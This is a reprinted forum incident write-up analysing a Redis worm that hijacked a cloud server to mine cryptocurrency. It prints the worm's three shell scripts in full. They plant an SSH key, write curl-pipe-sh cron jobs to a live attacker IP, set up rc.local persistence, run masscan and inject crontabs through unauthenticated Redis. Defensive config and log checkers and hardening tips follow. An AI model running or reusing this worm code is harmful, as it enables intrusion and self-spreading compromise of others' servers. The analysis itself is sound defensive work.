0x00 Background

When I arrived at the office on Monday morning, I heard from a colleague that there was a server nobody could log in to. I did not take it to heart and carried on eating breakfast while checking whether the coin price had dropped again. Soon the ops colleagues arrived too, panting: one of our servers had been frozen by Alibaba Cloud, reason given: malicious outbound traffic. I put down my pickled-cabbage bun and tried to SSH in; the connection was refused, and it turned out the default port 22 had been blocked. I asked ops to change the port and connected straight away. Glancing at the login details, I saw the username root and a beginner-grade password of fewer than 8 characters. A chill ran through me: it had been hacked!

0x01 Searching for clues

[Figure: process listing on the server showing a process named gpg-agentd]


A Google search for GPG says:

The GPG-Agent provided by GPG supports the SSH protocol, which greatly simplifies key management.

It looks like a legitimate program, but a closer look at the process on the server shows an extra letter "d" on the end (gpg-agentd), a neat disguise reminiscent of the many Windows viruses that name themselves after svchost.exe. Continue with:

ps eho command -p 23374
netstat -pan | grep 23374

Checking the startup path and network connections of PID 23374 led me to the directory in Figure 1, where I found the binary executable the attacker had left behind. Two more questions awaited me:

1. How was the file uploaded?

2. What does this file do, or what does the attacker want?

The shell history had been wiped clean, leaving no trace. Continuing with the command more messages (the system log):


I saw a lot of software installed on the server around midnight; a few of the packages caught my attention, and I will come back to them in more detail. Then I thought: if I wanted to do something bad, where would I put it? Something that runs automatically? Something that starts on a timer? Yes, a scheduled task.

crontab -e

Sure enough, the clue was found.

0x02 Motive

The scheduled task above downloads a script from the remote server and executes it every 15 minutes. Let's download the script and take a look.

curl -fsSL 159.89.190.243/ash.php > ash.sh

The script content is as follows:

uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php | sh' > /var/spool/cron/root
echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php | sh' > /var/spool/cron/crontabs/root
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
bash -c 'curl -fsSL 159.89.190.243/bsh.php | bash' 2>/dev/null

Here’s an overview of the main uses of this script:

It writes an SSH public key into /root/.ssh/authorized_keys, so that the attacker can log in to the server as root without a password every time, which makes running further scripts much easier (for background on SSH keys, see the article "SSH principle and application"). It also wipes the existing crontab and replaces it with its own entries that keep re-fetching ash.php. Next it installs bash, and finally it downloads the second script, bsh.php, and executes it.

Go ahead and download bsh.php; its contents are as follows:

sleep $( seq 3 7 | sort -R | head -n1 )
cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/...
sleep 1
if [ -f .watch ]; then
    rm -rf .watch
    exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk '! /awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '! /awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null
sleep 1
if ! [ -x /usr/bin/gpg-agentd ]; then
    curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db
    echo '/usr/bin/gpg-agentd' > /etc/rc.local
    echo 'curl -fsSL 159.89.190.243/ash.php | sh' >> /etc/rc.local
    echo 'exit 0' >> /etc/rc.local
fi
sleep 1
chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd
sleep 1
if ! [ -x "$(command -v masscan)" ]; then
    rm -rf /var/lib/apt/lists/*
    rm -rf x1.tar.gz
    if [ -x "$(command -v apt-get)" ]; then
        export DEBIAN_FRONTEND=noninteractive
        apt-get update -y
        apt-get install -y debconf-doc
        apt-get install -y build-essential
        apt-get install -y libpcap0.8-dev libpcap0.8
        apt-get install -y libpcap*
        apt-get install -y make gcc git
        apt-get install -y redis-server
        apt-get install -y redis-tools
        apt-get install -y redis
        apt-get install -y iptables
        apt-get install -y wget curl
    fi
    if [ -x "$(command -v yum)" ]; then
        yum update -y
        yum install -y epel-release
        yum update -y
        yum install -y git iptables make gcc redis libpcap libpcap-devel
        yum install -y wget curl
    fi
    sleep 1
    curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
    sleep 1
    [ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
fi
sleep 3 && rm -rf .watch
bash -c 'curl -fsSL 159.89.190.243/rsh.php | bash' 2>/dev/null

The code in this script is quite long, but it does four main things:

1. Download remote code to the local disk and add execute permission (chmod u+x).

2. Modify rc.local so that the local code runs automatically at startup.

3. Download the open-source scanner masscan from GitHub and install its build dependencies, which is the record I saw in the messages log above.

4. Download the third script and execute it.

I went to GitHub to take a look at the open-source code, and it blew my mind.

> MASSCAN: Mass IP port scanner
>
> This is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second.
>
> It produces results similar to nmap, the most famous port scanner. Internally, it operates more like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary address ranges and port ranges.
>
> NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.

Transmitting 10 million packets per second, faster than nmap, so it is not hard to understand why Alibaba Cloud froze the server. After reading the README, I went ahead and downloaded the third script:

setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat
echo 'config set dir "/var/spool/cron/"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
sleep 1
masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
sleep 1
while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .shard
sleep 1
masscan --max-rate 10000 -p6379,6380 192.168.0.0/16 [garbled]/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
sleep 1
while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .ranges
sleep 1
ip a | grep -oE '([0-9]{1,3}\.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
sleep 1
masscan --max-rate 10000 -p6379,6380 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
sleep 1
while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null

If the first two scripts merely download and execute binaries on the server, this one really shows the power of the virus. Let's examine it.

There is nothing to say about the initial changes to the system environment. The next step writes a file whose contents look familiar: anyone who has used Redis will recognise them as Redis commands. The script then uses masscan to find hosts with port 6379 or 6380 open and pipes that file into redis-cli against each of them: CONFIG SET dir points the dump at the cron spool, CONFIG SET dbfilename names the dump "root", and SAVE writes a crontab for root onto the victim. That crontab periodically downloads and runs ash.php, which in turn writes the attacker's key into /root/.ssh/authorized_keys and gives password-free login. If your Redis listens on a public IP address or 0.0.0.0 and there is no password protection, sorry, you are next in line.
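The conditions this script needs are all visible in redis.conf, so a deployment can be checked before it goes anywhere near a public interface. The following is an added example, not code from the original post: it reads a redis.conf and reports a bind that is missing or not loopback, a missing requirepass, protected-mode switched off (a Redis 3.2+ directive the post does not mention) and a CONFIG command still callable under its real name (rename-command is a real Redis directive; neither it nor protected-mode appears in the post, I add them because CONFIG SET dir/dbfilename is exactly the primitive used above). The function name and output format are my own.

```shell
#!/bin/sh
# Added example, not from the original post. check_redis_conf FILE prints one
# "WEAK ..." line per finding and a final "PROBLEMS n"; it returns 0 only when n is 0,
# so it can gate a deployment.

check_redis_conf() {
    conf="$1"
    problems=0

    # Effective value of a directive: the last uncommented occurrence wins in Redis.
    # Prints the directive's arguments, or nothing if it is not set.
    getdir() {
        grep -Ei "^[[:space:]]*$1[[:space:]]" "$conf" | tail -n1 |
            awk '{ $1 = ""; sub(/^[ \t]+/, ""); print }'
    }

    # 1. bind: absent means every interface; anything but loopback is reachable
    bind=$(getdir bind)
    if [ -z "$bind" ]; then
        echo "WEAK bind: not set, Redis accepts connections on every interface"
        problems=$((problems + 1))
    else
        for b in $bind; do
            case "$b" in
                127.*|-127.*|::1|-::1) ;;   # loopback forms only
                *) echo "WEAK bind: $b is reachable from the network"
                   problems=$((problems + 1)) ;;
            esac
        done
    fi

    # 2. protected-mode (Redis 3.2+) refuses remote clients when no bind/password is set
    pm=$(getdir protected-mode | tr 'A-Z' 'a-z')
    if [ "$pm" = "no" ]; then
        echo "WEAK protected-mode: no"
        problems=$((problems + 1))
    fi

    # 3. requirepass: without it any client that can connect has full access
    if [ -z "$(getdir requirepass)" ]; then
        echo "WEAK requirepass: not set, unauthenticated clients get full access"
        problems=$((problems + 1))
    fi

    # 4. rename-command CONFIG "" removes the dir/dbfilename trick used by the worm
    if ! grep -Ei '^[[:space:]]*rename-command[[:space:]]+config([[:space:]]|$)' "$conf" >/dev/null; then
        echo "WEAK rename-command: CONFIG is still callable by name"
        problems=$((problems + 1))
    fi

    echo "PROBLEMS $problems"
    [ "$problems" -eq 0 ]
}

# usage: sh redis_check.sh /etc/redis/redis.conf
if [ -n "${1:-}" ]; then
    check_redis_conf "$1"
fi
```

A weak file such as "bind 0.0.0.0" with no requirepass scores four problems; the hardened form, "bind 127.0.0.1", "protected-mode yes", a requirepass and 'rename-command CONFIG ""', scores none. The check reads the file only, so run it against the configuration actually loaded by the running instance.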


0x03 Summary

By analysing these three scripts in turn, we can see how nasty this virus is. First it obtains login access by writing an SSH public key, then it downloads and executes remote binaries, and finally it replicates through the Redis vulnerability, spreading rapidly across the network and growing at an exponential rate. So the question is: how did this server get hacked in the first place? In redis.conf, bind was 127.0.0.1, so Redis was not the way in. To test my suspicion, I took a look at lastb, and sure enough, there were plenty of records:


Just one last question: what exactly does this gpg-agentd program do? My first reaction was a cryptocurrency miner, because digital currencies are so popular now that the demand for distributed mining has grown, which in turn gave birth to this grey industry chain. Drag gpg-agentd into IDA and search the strings for bitcoin, eth, mine and so on.


Take a look at nicehash.com and everything becomes clear.


0x04 Security Suggestions

I. Server

1. Disable root login

2. Keep usernames and passwords complex

3. Change the default SSH port 22

4. Install DenyHosts to block brute-force cracking

5. Disable password login and log in with an RSA public key instead
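The lastb records mentioned in the summary are the raw material for suggestion 4: DenyHosts works by counting failed logins per source and banning sources that cross a threshold. The following is an added example, not code from the original post, that does the counting over lastb output (user, tty, source host, time), reporting the number of attempts and distinct usernames per source at or above a threshold. The function name and the output format are my own; the sample lines in the usage note and test are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. brute_force_sources FILE [THRESHOLD]
# reads lastb output (one failed login per line, e.g. "root ssh:notty 203.0.113.5 Mon ...")
# and prints "host N attempts M usernames" for every host with at least THRESHOLD
# failures, most active first. Feed it "lastb -w" so hostnames are not truncated.

brute_force_sources() {
    file="$1"
    thr="${2:-5}"   # minimum attempts before a source is reported
    awk -v thr="$thr" '
        # only SSH failures; the trailing "btmp begins ..." summary has no ssh: tty
        NF >= 3 && $2 ~ /^ssh:/ {
            n[$3]++
            key = $3 SUBSEP $1
            if (!(key in seen)) { seen[key] = 1; users[$3]++ }
        }
        END {
            for (h in n)
                if (n[h] >= thr)
                    printf "%s %d attempts %d usernames\n", h, n[h], users[h]
        }
    ' "$file" | sort -k2,2nr
}

# usage: lastb -w > /tmp/btmp.txt && sh bruteforce.sh /tmp/btmp.txt 10
if [ -n "${1:-}" ]; then
    brute_force_sources "$1" "${2:-5}"
fi
```

A source that tries several usernames is the classic dictionary pattern; a single username hammered from many sources is the distributed variant, which a per-source threshold will miss, so watch the total failure rate as well.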

II. Redis

1. Do not listen on public IP addresses, including 0.0.0.0

2. Use a password to restrict access to Redis

3. Run Redis under a low-privilege account

If you are interested in the sample, you can also curl or run the scripts above in a virtual machine. Given my limited ability, there are bound to be oversights or errors in this text; corrections are welcome.

This article is reprinted from Hefe on the Kanxue (Watch Snow) forum; when reproducing it, please credit the Kanxue community.